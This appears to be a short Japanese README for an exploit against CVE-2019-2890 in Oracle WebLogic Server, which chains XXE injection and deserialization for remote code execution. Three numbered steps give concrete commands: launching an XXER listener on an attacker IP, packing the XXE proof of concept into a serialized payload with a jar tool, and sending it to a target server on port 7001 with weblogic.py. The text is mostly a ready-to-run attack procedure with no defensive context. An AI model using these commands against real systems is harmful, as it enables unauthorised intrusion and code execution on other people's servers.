
CVE-2019-2890用のエクスプロイト。XXEインジェクションとデシリアライゼーションを介してOracle WebLogic Serverを標的とし、巧妙に細工されたペイロードによるリモートコード実行を可能にします。
1)XXERツールを起動 python xxer.py -H 192.168.17.223
2)xxerのPoCをxx.xmlファイルに配置し、シリアライズ後のデータを置き換えて、xxerのPoCを注入します; java -jar weblogic_xxe.jar xx.xml
3)java-deserialization-exploitツール内のweblogic.pyを使用して、データをWeblogicサーバに送信します python weblogic.py 192.168.17.222 7001 weblogic